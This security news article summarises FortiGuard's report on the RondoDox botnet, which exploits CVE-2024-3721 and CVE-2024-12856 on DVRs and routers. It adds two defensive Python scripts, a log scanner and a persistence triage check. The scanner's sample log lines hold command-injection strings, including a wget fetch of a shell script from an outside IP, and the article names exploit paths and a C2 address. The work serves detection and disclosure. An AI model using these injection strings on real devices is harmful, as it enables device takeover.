RondoDox downloader shell script | Image: FortiGuard Labs
FortiGuard Labs has uncovered a stealthy and highly adaptive botnet dubbed RondoDox, which is actively exploiting two critical vulnerabilities—CVE-2024-3721 and CVE-2024-12856. According to Fortinet’s threat intelligence team, RondoDox poses “serious risks to device security and overall network integrity,” as it targets unpatched Linux-based devices with advanced evasion and persistence techniques.
RondoDox has been observed leveraging two distinct vulnerabilities to gain remote command execution capabilities:
- CVE-2024-3721 affects TBK DVR models such as DVR-4104 and DVR-4216. This flaw arises from the improper handling of the /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ path, allowing attackers to inject OS commands by manipulating the mdb and mdc parameters.
- CVE-2024-12856 targets Four-Faith router models F3x24 and F3x36, where authenticated attackers can abuse the apply.cgi interface to execute arbitrary commands when modifying system time.
Both vulnerabilities are already being weaponized in the wild. FortiGuard notes that “RondoDox incorporates custom libraries and mimics traffic from gaming platforms or VPN servers to evade detection.”
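As an added example (not from FortiGuard's report or from the RondoDox code), the following Python scans web-server access-log lines for the two exploitation paths described above. The request path and the opt, cmd, mdb and mdc parameters for CVE-2024-3721 are taken from the description on this page; the apply.cgi rule is a heuristic, because the Four-Faith payload normally travels in a POST body that access logs do not record. The log lines, IP addresses and the query parameter on the apply.cgi request are constructed for illustration.

```python
"""Flag access-log requests that match the RondoDox exploitation paths.

Added example; not part of FortiGuard's report.  Sample log lines are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters in a parameter value are the usual sign that a CGI
# which passes input to a shell is being fed an injected command.
SHELL_META = re.compile(r'[;|&`$]')


def classify_request(method: str, target: str):
    """Return a rule name if the request matches a known exploit path, else None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)

    # CVE-2024-3721 (TBK DVR): /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
    # with the injected command carried in the mdb / mdc parameters.
    if (parts.path.endswith('/device.rsp')
            and params.get('opt') == ['sys']
            and params.get('cmd') == ['___S_O_S_T_R_E_A_MAX___']
            and any(SHELL_META.search(v)
                    for k in ('mdb', 'mdc') for v in params.get(k, []))):
        return 'CVE-2024-3721'

    # CVE-2024-12856 (Four-Faith): command injection through apply.cgi.
    # Heuristic only (an assumption of this example): it catches attempts that
    # leak metacharacters into the query string, not payloads in a POST body.
    if (parts.path.endswith('/apply.cgi') and method == 'POST'
            and any(SHELL_META.search(v) for vs in params.values() for v in vs)):
        return 'CVE-2024-12856 (heuristic)'
    return None


def scan_log(lines):
    """Yield (src_ip, rule, target) for every log line that matches a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        rule = classify_request(m['method'], m['target'])
        if rule:
            yield m['src'], rule, m['target']


# Constructed sample log lines (documentation-range IPs; "adj" is a made-up parameter name).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2025:12:00:01 +0000] "GET /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20/tmp;wget%20http://198.51.100.7/x.sh HTTP/1.1" 200 12',
    '198.51.100.7 - - [10/Jun/2025:12:00:02 +0000] "POST /apply.cgi?adj=1;id HTTP/1.1" 200 35',
    '192.0.2.44 - - [10/Jun/2025:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '192.0.2.45 - - [10/Jun/2025:12:00:04 +0000] "GET /device.rsp?opt=sys'
    '&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=1 HTTP/1.1" 200 12',
]

if __name__ == '__main__':
    for src, rule, target in scan_log(SAMPLE_LOG):
        print(f'{src}\t{rule}\t{target}')
```

The last sample line hits the same DVR path without any metacharacters in mdc and is deliberately not flagged; if the path is never used legitimately on your network, you may prefer to alert on every request to it and let the metacharacter check set severity instead.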
RondoDox initially targeted Linux systems on ARM and MIPS, the architectures typical of routers and DVRs, and has since added builds for x86-64, Intel 80386 (i386), PowerPC, AArch64 and others. Its shell-script downloader looks for a writable directory it can execute from, installs the payload there, and wipes logs and shell histories to cover its tracks.
The malware decodes its configuration using an XOR-based obfuscation algorithm and embeds a shell script to ensure multi-layered persistence. This script modifies system startup files like /etc/rcS, crontab, and even creates symbolic links (e.g., /etc/rc3.d/S99rondo) to maintain control across reboots.
Once embedded, RondoDox scans running processes for common analysis and forensic tools such as wireshark, gdb and tcpdump, and for competing malware such as xmrig or Redtail, and kills any it finds. More disruptively, it renames key system executables, including iptables, passwd and shutdown, to random strings; this cripples normal administration and complicates incident response, since responders can no longer rely on those binaries being where they expect.
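The persistence artefacts and renamed binaries described in the two paragraphs above are what a responder would check first on a suspect device. The following read-only triage pass is an added example (not FortiGuard's tooling and not derived from the malware): it takes a root directory so it can be pointed at a mounted firmware image or a live system, and the self-test builds a throwaway fake root. The /etc/rc3.d/S99rondo name comes from this page; the symlink target, the writable-directory heuristic for startup-file lines, and the candidate binary paths are assumptions of the example.

```python
"""Read-only triage for RondoDox-style persistence and renamed system binaries.

Added example; not FortiGuard's code.  build_fake_root() constructs sample data.
"""
import os
import re
import tempfile

# Startup files the report names as modified.  The report writes /etc/rcS;
# on most BusyBox-based devices the file lives at /etc/init.d/rcS, so check both.
STARTUP_FILES = ['etc/rcS', 'etc/init.d/rcS', 'etc/crontab']
# rc*.d directories where the S99rondo symlink may have been dropped.
RC_DIRS = ['etc/rc%s.d' % n for n in ('S', '0', '1', '2', '3', '4', '5', '6')]
# Binaries the report says get renamed; the usual paths are an assumption.
EXPECTED_BINARIES = {
    'iptables': ['sbin/iptables', 'usr/sbin/iptables'],
    'passwd':   ['usr/bin/passwd', 'bin/passwd'],
    'shutdown': ['sbin/shutdown', 'usr/sbin/shutdown'],
}
# Heuristic: startup lines that launch something from a writable directory.
SUSPECT_LINE = re.compile(r'/tmp/|/var/tmp/|/dev/shm/|rondo', re.I)
WRITABLE_TOP_DIRS = ('tmp', 'var', 'dev')


def find_rc_entries(root):
    """Return (path, link_target) for S99rondo or any rc*.d symlink into a writable dir."""
    hits = []
    for rc in RC_DIRS:
        d = os.path.join(root, rc)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            target = os.readlink(p) if os.path.islink(p) else None
            into_writable = bool(target) and target.lstrip('/').split('/')[0] in WRITABLE_TOP_DIRS
            if name == 'S99rondo' or into_writable:
                hits.append((os.path.join('/', rc, name), target))
    return hits


def find_startup_edits(root):
    """Return (file, line_no, line) for suspect lines in rcS / crontab."""
    hits = []
    for rel in STARTUP_FILES:
        p = os.path.join(root, rel)
        if not os.path.isfile(p):
            continue
        with open(p, errors='replace') as f:
            for line_no, line in enumerate(f, 1):
                if SUSPECT_LINE.search(line):
                    hits.append(('/' + rel, line_no, line.rstrip()))
    return hits


def find_missing_binaries(root):
    """Return names of expected binaries present at none of their candidate paths."""
    return sorted(name for name, cands in EXPECTED_BINARIES.items()
                  if not any(os.path.exists(os.path.join(root, c)) for c in cands))


def triage(root='/'):
    """Run all three checks against a root directory (live system or mounted image)."""
    return {
        'rc_entries': find_rc_entries(root),
        'startup_edits': find_startup_edits(root),
        'missing_binaries': find_missing_binaries(root),
    }


def build_fake_root():
    """Construct a throwaway root carrying the artefacts above (sample data, not a real infection)."""
    root = tempfile.mkdtemp(prefix='rondo-triage-')
    for d in ('etc/init.d', 'etc/rc3.d', 'sbin', 'usr/bin', 'usr/sbin'):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, 'etc/init.d/rcS'), 'w') as f:
        f.write('#!/bin/sh\nmount -a\n/var/tmp/.rondo/run &\n')   # assumed payload path
    with open(os.path.join(root, 'etc/crontab'), 'w') as f:
        f.write('0 * * * * root /usr/sbin/logrotate\n')              # benign line
    os.symlink('/var/tmp/.rondo/run', os.path.join(root, 'etc/rc3.d/S99rondo'))
    open(os.path.join(root, 'sbin/Xq7pLm'), 'w').close()   # iptables renamed to a random string
    open(os.path.join(root, 'usr/bin/passwd'), 'w').close()
    open(os.path.join(root, 'sbin/shutdown'), 'w').close()
    return root


if __name__ == '__main__':
    for key, value in triage(build_fake_root()).items():
        print(key, value)
```

Run it with `triage('/mnt/image')` against a mounted root rather than on the infected device itself where possible; the malware kills tcpdump and gdb on sight, and a live system whose iptables and shutdown have been renamed is not a trustworthy place to collect evidence.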
After setup, RondoDox decodes its C2 server address—83[.]150[.]218[.]93—and initiates communication. It can then launch DDoS attacks via HTTP, UDP, and TCP, disguising its traffic as legitimate packets from popular platforms like Minecraft, Discord, Valve, Fortnite, and OpenVPN.
FortiGuard notes: “By impersonating these legitimate services, the malware significantly increases the difficulty for defenders in effectively identifying and blocking its traffic.”
RondoDox is not just another Mirai clone. Its layered persistence, mimicry of legitimate services, and destructive behavior make it a formidable adversary. FortiGuard’s conclusion is clear:
“RondoDox is a sophisticated and emerging malware threat that employs advanced evasion techniques… highlighting the critical need for timely patching of affected systems.”